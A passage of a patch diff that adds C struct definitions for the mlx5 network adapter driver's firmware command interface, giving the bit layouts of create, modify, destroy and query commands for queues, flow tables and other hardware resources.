op_mod[0x10]; + + u8 reserved_2[0x40]; +}; + +struct mlx5_ifc_qp_2rst_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_qp_2rst_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x8]; + u8 qpn[0x18]; + + u8 reserved_3[0x20]; +}; + +struct mlx5_ifc_qp_2err_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_qp_2err_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x8]; + u8 qpn[0x18]; + + u8 reserved_3[0x20]; +}; + +struct mlx5_ifc_page_fault_resume_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_page_fault_resume_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 error[0x1]; + u8 reserved_2[0x4]; + u8 rdma[0x1]; + u8 read_write[0x1]; + u8 req_res[0x1]; + u8 qpn[0x18]; + + u8 reserved_3[0x20]; +}; + +struct mlx5_ifc_nop_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_nop_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x40]; +}; + +struct mlx5_ifc_modify_vport_state_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_modify_vport_state_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 other_vport[0x1]; + u8 reserved_2[0xf]; + u8 vport_number[0x10]; + + u8 reserved_3[0x18]; + u8 admin_state[0x4]; + u8 reserved_4[0x4]; +}; + +struct mlx5_ifc_modify_tis_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_modify_tis_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x8]; + u8 tisn[0x18]; + + u8 reserved_3[0x20]; + + u8 modify_bitmask[0x40]; + + u8 reserved_4[0x40]; + + struct mlx5_ifc_tisc_bits ctx; +}; + +struct mlx5_ifc_modify_tir_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_modify_tir_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x8]; + u8 tirn[0x18]; + + u8 reserved_3[0x20]; + + u8 modify_bitmask[0x40]; + + u8 reserved_4[0x40]; + + struct mlx5_ifc_tirc_bits ctx; +}; + +struct mlx5_ifc_modify_sq_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_modify_sq_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 sq_state[0x4]; + u8 reserved_2[0x4]; + u8 sqn[0x18]; + + u8 reserved_3[0x20]; + + u8 modify_bitmask[0x40]; + + u8 reserved_4[0x40]; + + struct mlx5_ifc_sqc_bits ctx; +}; + +struct mlx5_ifc_modify_rqt_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_modify_rqt_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x8]; + u8 rqtn[0x18]; + + u8 reserved_3[0x20]; + + u8 modify_bitmask[0x40]; + + u8 reserved_4[0x40]; + + struct mlx5_ifc_rqtc_bits ctx; +}; + +struct mlx5_ifc_modify_rq_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_modify_rq_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 rq_state[0x4]; + u8 reserved_2[0x4]; + u8 rqn[0x18]; + + u8 reserved_3[0x20]; + + u8 modify_bitmask[0x40]; + + u8 reserved_4[0x40]; + + struct mlx5_ifc_rqc_bits ctx; +}; + +struct mlx5_ifc_modify_rmp_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_modify_rmp_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 rmp_state[0x4]; + u8 reserved_2[0x4]; + u8 rmpn[0x18]; + + u8 reserved_3[0x20]; + + u8 modify_bitmask[0x40]; + + u8 reserved_4[0x40]; + + struct mlx5_ifc_rmpc_bits ctx; +}; + +struct mlx5_ifc_modify_nic_vport_context_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_modify_nic_vport_field_select_bits { + u8 reserved_0[0x1c]; + u8 permanent_address[0x1]; + u8 addresses_list[0x1]; + u8 roce_en[0x1]; + u8 reserved_1[0x1]; +}; + +struct mlx5_ifc_modify_nic_vport_context_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 other_vport[0x1]; + u8 reserved_2[0xf]; + u8 vport_number[0x10]; + + struct mlx5_ifc_modify_nic_vport_field_select_bits field_select; + + u8 reserved_3[0x780]; + + struct mlx5_ifc_nic_vport_context_bits nic_vport_context; +}; + +struct mlx5_ifc_modify_hca_vport_context_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_modify_hca_vport_context_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 other_vport[0x1]; + u8 reserved_2[0xf]; + u8 vport_number[0x10]; + + u8 reserved_3[0x20]; + + struct mlx5_ifc_hca_vport_context_bits hca_vport_context; +}; + +struct mlx5_ifc_modify_cq_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +enum { + MLX5_MODIFY_CQ_IN_OP_MOD_MODIFY_CQ = 0x0, + MLX5_MODIFY_CQ_IN_OP_MOD_RESIZE_CQ = 0x1, +}; + +struct mlx5_ifc_modify_cq_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x8]; + u8 cqn[0x18]; + + union mlx5_ifc_modify_field_select_resize_field_select_auto_bits modify_field_select_resize_field_select; + + struct mlx5_ifc_cqc_bits cq_context; + + u8 reserved_3[0x600]; + + u8 pas[0][0x40]; +}; + +struct mlx5_ifc_modify_cong_status_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_modify_cong_status_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x18]; + u8 priority[0x4]; + u8 cong_protocol[0x4]; + + u8 enable[0x1]; + u8 tag_enable[0x1]; + u8 reserved_3[0x1e]; +}; + +struct mlx5_ifc_modify_cong_params_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_modify_cong_params_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x1c]; + u8 cong_protocol[0x4]; + + union mlx5_ifc_field_select_802_1_r_roce_auto_bits field_select; + + u8 reserved_3[0x80]; + + union mlx5_ifc_cong_control_roce_ecn_auto_bits congestion_parameters; +}; + +struct mlx5_ifc_manage_pages_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 output_num_entries[0x20]; + + u8 reserved_1[0x20]; + + u8 pas[0][0x40]; +}; + +enum { + MLX5_MANAGE_PAGES_IN_OP_MOD_ALLOCATION_FAIL = 0x0, + MLX5_MANAGE_PAGES_IN_OP_MOD_ALLOCATION_SUCCESS = 0x1, + MLX5_MANAGE_PAGES_IN_OP_MOD_HCA_RETURN_PAGES = 0x2, +}; + +struct mlx5_ifc_manage_pages_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x10]; + u8 function_id[0x10]; + + u8 input_num_entries[0x20]; + + u8 pas[0][0x40]; +}; + +struct mlx5_ifc_mad_ifc_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; + + u8 response_mad_packet[256][0x8]; +}; + +struct mlx5_ifc_mad_ifc_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 remote_lid[0x10]; + u8 reserved_2[0x8]; + u8 port[0x8]; + + u8 reserved_3[0x20]; + + u8 mad[256][0x8]; +}; + +struct mlx5_ifc_init_hca_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_init_hca_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x40]; +}; + +struct mlx5_ifc_init2rtr_qp_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_init2rtr_qp_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x8]; + u8 qpn[0x18]; + + u8 reserved_3[0x20]; + + u8 opt_param_mask[0x20]; + + u8 reserved_4[0x20]; + + struct mlx5_ifc_qpc_bits qpc; + + u8 reserved_5[0x80]; +}; + +struct mlx5_ifc_init2init_qp_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_init2init_qp_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x8]; + u8 qpn[0x18]; + + u8 reserved_3[0x20]; + + u8 opt_param_mask[0x20]; + + u8 reserved_4[0x20]; + + struct mlx5_ifc_qpc_bits qpc; + + u8 reserved_5[0x80]; +}; + +struct mlx5_ifc_get_dropped_packet_log_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; + + u8 packet_headers_log[128][0x8]; + + u8 packet_syndrome[64][0x8]; +}; + +struct mlx5_ifc_get_dropped_packet_log_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x40]; +}; + +struct mlx5_ifc_gen_eqe_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x18]; + u8 eq_number[0x8]; + + u8 reserved_3[0x20]; + + u8 eqe[64][0x8]; +}; + +struct mlx5_ifc_gen_eq_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_enable_hca_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x20]; +}; + +struct mlx5_ifc_enable_hca_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x10]; + u8 function_id[0x10]; + + u8 reserved_3[0x20]; +}; + +struct mlx5_ifc_drain_dct_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_drain_dct_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x8]; + u8 dctn[0x18]; + + u8 reserved_3[0x20]; +}; + +struct mlx5_ifc_disable_hca_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x20]; +}; + +struct mlx5_ifc_disable_hca_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x10]; + u8 function_id[0x10]; + + u8 reserved_3[0x20]; +}; + +struct mlx5_ifc_detach_from_mcg_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_detach_from_mcg_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x8]; + u8 qpn[0x18]; + + u8 reserved_3[0x20]; + + u8 multicast_gid[16][0x8]; +}; + +struct mlx5_ifc_destroy_xrc_srq_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_destroy_xrc_srq_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x8]; + u8 xrc_srqn[0x18]; + + u8 reserved_3[0x20]; +}; + +struct mlx5_ifc_destroy_tis_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_destroy_tis_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x8]; + u8 tisn[0x18]; + + u8 reserved_3[0x20]; +}; + +struct mlx5_ifc_destroy_tir_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_destroy_tir_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x8]; + u8 tirn[0x18]; + + u8 reserved_3[0x20]; +}; + +struct mlx5_ifc_destroy_srq_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_destroy_srq_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x8]; + u8 srqn[0x18]; + + u8 reserved_3[0x20]; +}; + +struct mlx5_ifc_destroy_sq_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_destroy_sq_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x8]; + u8 sqn[0x18]; + + u8 reserved_3[0x20]; +}; + +struct mlx5_ifc_destroy_rqt_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_destroy_rqt_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x8]; + u8 rqtn[0x18]; + + u8 reserved_3[0x20]; +}; + +struct mlx5_ifc_destroy_rq_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_destroy_rq_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x8]; + u8 rqn[0x18]; + + u8 reserved_3[0x20]; +}; + +struct mlx5_ifc_destroy_rmp_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_destroy_rmp_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x8]; + u8 rmpn[0x18]; + + u8 reserved_3[0x20]; +}; + +struct mlx5_ifc_destroy_qp_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_destroy_qp_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x8]; + u8 qpn[0x18]; + + u8 reserved_3[0x20]; +}; + +struct mlx5_ifc_destroy_psv_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_destroy_psv_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x8]; + u8 psvn[0x18]; + + u8 reserved_3[0x20]; +}; + +struct mlx5_ifc_destroy_mkey_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_destroy_mkey_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x8]; + u8 mkey_index[0x18]; + + u8 reserved_3[0x20]; +}; + +struct mlx5_ifc_destroy_flow_table_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_destroy_flow_table_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x40]; + + u8 table_type[0x8]; + u8 reserved_3[0x18]; + + u8 reserved_4[0x8]; + u8 table_id[0x18]; + + u8 reserved_5[0x140]; +}; + +struct mlx5_ifc_destroy_flow_group_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_destroy_flow_group_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x40]; + + u8 table_type[0x8]; + u8 reserved_3[0x18]; + + u8 reserved_4[0x8]; + u8 table_id[0x18]; + + u8 group_id[0x20]; + + u8 reserved_5[0x120]; +}; + +struct mlx5_ifc_destroy_eq_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_destroy_eq_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x18]; + u8 eq_number[0x8]; + + u8 reserved_3[0x20]; +}; + +struct mlx5_ifc_destroy_dct_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_destroy_dct_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x8]; + u8 dctn[0x18]; + + u8 reserved_3[0x20]; +}; + +struct mlx5_ifc_destroy_cq_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_destroy_cq_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x8]; + u8 cqn[0x18]; + + u8 reserved_3[0x20]; +}; + +struct mlx5_ifc_delete_vxlan_udp_dport_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_delete_vxlan_udp_dport_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x20]; + + u8 reserved_3[0x10]; + u8 vxlan_udp_port[0x10]; +}; + +struct mlx5_ifc_delete_l2_table_entry_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_delete_l2_table_entry_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x60]; + + u8 reserved_3[0x8]; + u8 table_index[0x18]; + + u8 reserved_4[0x140]; +}; + +struct mlx5_ifc_delete_fte_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_delete_fte_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x40]; + + u8 table_type[0x8]; + u8 reserved_3[0x18]; + + u8 reserved_4[0x8]; + u8 table_id[0x18]; + + u8 reserved_5[0x40]; + + u8 flow_index[0x20]; + + u8 reserved_6[0xe0]; +}; + +struct mlx5_ifc_dealloc_xrcd_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_dealloc_xrcd_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x8]; + u8 xrcd[0x18]; + + u8 reserved_3[0x20]; +}; + +struct mlx5_ifc_dealloc_uar_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_dealloc_uar_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x8]; + u8 uar[0x18]; + + u8 reserved_3[0x20]; +}; + +struct mlx5_ifc_dealloc_transport_domain_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_dealloc_transport_domain_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x8]; + u8 transport_domain[0x18]; + + u8 reserved_3[0x20]; +}; + +struct mlx5_ifc_dealloc_q_counter_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_dealloc_q_counter_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x18]; + u8 counter_set_id[0x8]; + + u8 reserved_3[0x20]; +}; + +struct mlx5_ifc_dealloc_pd_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_dealloc_pd_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x8]; + u8 pd[0x18]; + + u8 reserved_3[0x20]; +}; + +struct mlx5_ifc_create_xrc_srq_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x8]; + u8 xrc_srqn[0x18]; + + u8 reserved_2[0x20]; +}; + +struct mlx5_ifc_create_xrc_srq_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x40]; + + struct mlx5_ifc_xrc_srqc_bits xrc_srq_context_entry; + + u8 reserved_3[0x600]; + + u8 pas[0][0x40]; +}; + +struct mlx5_ifc_create_tis_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x8]; + u8 tisn[0x18]; + + u8 reserved_2[0x20]; +}; + +struct mlx5_ifc_create_tis_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0xc0]; + + struct mlx5_ifc_tisc_bits ctx; +}; + +struct mlx5_ifc_create_tir_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x8]; + u8 tirn[0x18]; + + u8 reserved_2[0x20]; +}; + +struct mlx5_ifc_create_tir_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0xc0]; + + struct mlx5_ifc_tirc_bits ctx; +}; + +struct mlx5_ifc_create_srq_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x8]; + u8 srqn[0x18]; + + u8 reserved_2[0x20]; +}; + +struct mlx5_ifc_create_srq_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x40]; + + struct mlx5_ifc_srqc_bits srq_context_entry; + + u8 reserved_3[0x600]; + + u8 pas[0][0x40]; +}; + +struct mlx5_ifc_create_sq_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x8]; + u8 sqn[0x18]; + + u8 reserved_2[0x20]; +}; + +struct mlx5_ifc_create_sq_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0xc0]; + + struct mlx5_ifc_sqc_bits ctx; +}; + +struct mlx5_ifc_create_rqt_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x8]; + u8 rqtn[0x18]; + + u8 reserved_2[0x20]; +}; + +struct mlx5_ifc_create_rqt_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0xc0]; + + struct mlx5_ifc_rqtc_bits rqt_context; +}; + +struct mlx5_ifc_create_rq_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x8]; + u8 rqn[0x18]; + + u8 reserved_2[0x20]; +}; + +struct mlx5_ifc_create_rq_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0xc0]; + + struct mlx5_ifc_rqc_bits ctx; +}; + +struct mlx5_ifc_create_rmp_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x8]; + u8 rmpn[0x18]; + + u8 reserved_2[0x20]; +}; + +struct mlx5_ifc_create_rmp_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0xc0]; + + struct mlx5_ifc_rmpc_bits ctx; +}; + +struct mlx5_ifc_create_qp_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x8]; + u8 qpn[0x18]; + + u8 reserved_2[0x20]; +}; + +struct mlx5_ifc_create_qp_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x40]; + + u8 opt_param_mask[0x20]; + + u8 reserved_3[0x20]; + + struct mlx5_ifc_qpc_bits qpc; + + u8 reserved_4[0x80]; + + u8 